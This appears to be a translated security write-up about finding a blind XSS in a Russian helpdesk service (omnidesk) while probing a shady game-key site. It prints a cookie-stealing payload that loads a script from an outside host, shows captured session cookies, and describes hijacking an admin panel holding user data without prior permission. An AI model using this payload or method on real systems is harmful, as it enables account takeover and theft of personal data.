Background: This story begins with the fact that in many public places, to which I signed, saw the sowing (advertising in social networks) of groups with free Steam keys vk.com/******* and vk.com/*** **. These expensive ads were produced in groups of 250,000 to 5,000,000 subscribers, for example, in the Science and Technology group. The groups offered everyone a free key for subscription. After about half a month I saw that the first group had grown to 109,000 subscribers. Here anyone understands that people will not get a free key, because they do not “freeze” free keys for 100,000 people. A little inspection of the group, I realized that the “real” feedback on the receipt of free fake keys, because screenshots of the reviews all the time throw the same and links to people fake.
The most interesting thing is that people are still doing this all the time, join the group in the hope of a free key, make a repost in the hope that they will be lucky and they will win an expensive gaming PC (
but we know that no one will get a PC), when they want to get something for free, they are easy to manipulate for their own purposes.
The whole essence of the posts in the group is the advertisement of the referral link to the site http://kfgrandom.ru/ and the receipt of the benefit.
Let’s look at him.
It is written that the site for more than three years, although the domain kfgrandom.ru registered on 2016.10.07.
Click on “I want to earn” and see the message:
Do you have a group and want to earn money on it? Get the link and drain the traffic, getting 75% from each key sold. We consider public from 5,000 subscribers.
Mathematics: For example, of 100,000 subscribers, 10% bought a key for 100 rubles, then the publishers will receive: 10,000 * 100 = 1,000,000 – 250,000 (25%) = 750,000 rubles ($12 500). A good salary, probably, they will pay well for the vulnerability found on their service.
For sites http://imba-keys.ru/ and https://kfgrandom.ru the support service is the same. We test support service on url http://support.gamedelivery.info/. I’m look at personal cabinet, but there are no vulnerabilities found, and in the search for tickets too. Hope only to send a request to support service.
We test for a blind xss-vulnerability – send the admin the treatment of the name and body:
We sent to the admin js with our sniffer and redirect to our site. We look at the logs:
** 3.9 * .56.123 – – [18 / Feb / 2017: 01: 14: 10 +0300] “GET / gamedelivery HTTP / 1.1” 200 391686 “-” “Mozilla / 5.0 (X11; Linux x86_64) AppleWebKit / 537.36 ( KHTML, like Gecko) Chrome / 32.0.1700.2 Safari / 537.36 ”
Logs to the sniffer did not come, only the redirect script was executed, so in the user support is a filter on the
We try to load our sniffer script in another way: as onerror in img:
var scriрt =document.сreatеElеment(‘script’);script.src =’//securityz.net/test_for_habr.js’; documеnt.body.appendChild(script);
We are waiting for the administrator to enter the ticket with the js and give us all his cookies, the screenshot of the page and the entire html-code of the page.
The script was execute on /staff/cases/list/filter/open, cookies came to me.
PHPSESSID=4182ssjqfae0fl73f7lqkgdcb8; ajs_anonymous_id=%22c8582a35-f81b-43bd-8223-e0c7c43bc53a%22; _hjIncludedInSample=1; _cioid=client-2990; _cio=54bdeef1-058c-8f11-47fe-26d4f538fcf7; ajs_user_id=null; ajs_group_id=null
And a screenshot:
I was not happy with the cookies, because I often encounter httponly, here it can be the same.
I substitute cookies and I find myself in the employee panel.
I’m trying to change the password on my account, but for this action I need the current password. I can not add a new employee, because this account does not have enough rights.
We can look at all tickets (there are only 10 thousand) and all users. Many users in the applications are not happy with the service, the wrong key came, the key was already used, the key did not come, the game that I dont want (well, here the user himself is to blame, it is written that a random game). Also we can download all data with one click.
Users only 18 thousand, we can download such information: Username, email, links to its social network – facebook, vk, googlePlus, skype, viber. We can also edit information about any user, manage any ticket, write to arbitrary email addresses on behalf of firstname.lastname@example.org (we send emails to all email addresses from the database of phishing emails / link to competitor’s site) and edit any article from the database knowledge. And do not just edit it, but you can also write any js, and it will execute in any user.
After i’m discovered the vulnerability, immediately reported this in the feedback. While waiting for an answer, my friend told me that this support service is a project omnidesk.ru. They provide such Support Service to many companies. This means that in this way, using blind xss, it would be possible to hack all omnidesk clients. They are not available for public access.
But there would be an attacker in my place, he would have hacked an employee support.omnidesk.ru, merged the list of all companies, and attacked them.
We use Google Dork site:*.omnidesk.ru and we find 2050 companies! This is quite a lot. But this is not all companies, they are actually more, because not all companies use the canonical name *.omnidesk.ru. Gamedelivery.omnidesk.ru, for example, is not present in search engines, it anywhere does not shine. The only option is to look at the subnet ip. If this vulnerability fell into the hands of criminals, there would be a huge drain of data. Sites with the largest alexarank (in Russia):
- There is a demo period for using the service – 14 days, and then you need to pay. Hence, omnidesk also earns good money.
There came a response from kfgrandom.ru that the vulnerability and the drain of their databases is not their problem, but omnidesk. We write omnidesk. The manager first offers 1000 rubles ($16) for information about this xss.
We write that this vulnerability is critical and we ask you to slightly increase the amount of compensation.
I can offer 3000 rubles.
We can not pay much for such a lot. First, we are not as rich as you think. Secondly, you first reported the vulnerability to the client, and only then to us. Thirdly, you already have customer data. That is, everything that we would like to avoid happened. The vulnerability itself was corrected.
February 15 at 14.24: Logs came.
February 15 at 15.33: “‘m write to the owner of the support service.
February, 16 in 1.13: The award of 3000 rubles ($50).
February 17: I’m help developers with security.
February 20: Developers eliminate the remaining vulnerabilities.
XSS on omnidesk, video:
The site omnidesk is very good, it’s bad that they are so concerned about their security. Now, I think, they realized that security in the project should be put on the first place. I really hope that this article will not affect their reputation in any way.
Many companies can point to a “hole” in security, they will understand that the hole needs to be closed, and some just do not care about the security of their site, they think “It works, well, let it work, we will not touch it.” Example – CEO of the company from Odessa (Ukraine) serpstat.com (alexarank 10 000 in Russia), the only way to contact the developers is to write to the chat. Here is the chat transcript:
I: I found an XSS vulnerability, where can I send information about it?
Evgeny: Vulnerability on our service?
Me: Yes, on yours.
Eugene: We are invulnerable, like the protagonist in Die Hard-3.
I: I also found iDOR, I can delete any project on the site, give a number.
Eugene: Without problems, 85987.
(The operator will then pretend that I did not delete his project: D, although I was able to delete the project on the second test account).
I: I also found an XSS vulnerability on your site https://www.openbugbounty.org/incidents/213614/.
Me: Do you need it, send details?
Eugene: Thank you, leave it to yourself.
I: it feels like you do not care about the security of the website.
Eugene: I rather do not want to go over any links that you write in the chat
(most likely, the link to openbugbounty scare the operator)
Screenshot of the correspondence:
By the way, you can make a nice meme from this: D
The conclusion from this article: In the administrative panel, you need to put cookies on HttpOnly. serpstat.com – does not care about its safety, it is better not to trust this company with your data.
Previous article: [BugBounty] Partial authentication bypass vk.com.
P.S: I ask to subscribe to vk and twitter, I will post information about new articles.